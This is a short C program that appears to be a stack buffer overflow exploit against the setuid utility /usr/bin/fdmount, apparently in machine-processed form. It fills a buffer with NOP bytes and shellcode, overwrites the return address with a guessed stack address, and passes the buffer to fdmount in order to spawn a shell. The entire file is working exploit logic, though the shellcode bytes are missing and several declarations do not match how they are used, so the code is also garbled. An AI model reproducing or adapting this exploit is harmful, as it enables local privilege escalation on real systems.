
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFSIZE ;
 scalar_t__ atoi (char*) ;
 unsigned long eip ;
 int execl (char*,char*,char*,char*,int *) ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int,int) ;
 int shell ;
 int strlen (int ) ;

main(int argc, char **argv)
{
  int i,j;
  char buffer[BUFFSIZE+6];
  unsigned long eip=(unsigned long)&eip;
  unsigned long *ptr;


  if(argc>1)
   eip+=atoi(argv[1]);

  memset(buffer,0x90,75);
  memcpy(buffer+(BUFFSIZE-strlen(shell)),shell,strlen(shell));

 ptr=(unsigned long*)(buffer+71);
 *ptr=eip;

 buffer[75]=0;
 buffer[0]='/';

 execl("/usr/bin/fdmount","fdmount","fd0",buffer,((void*)0));
}
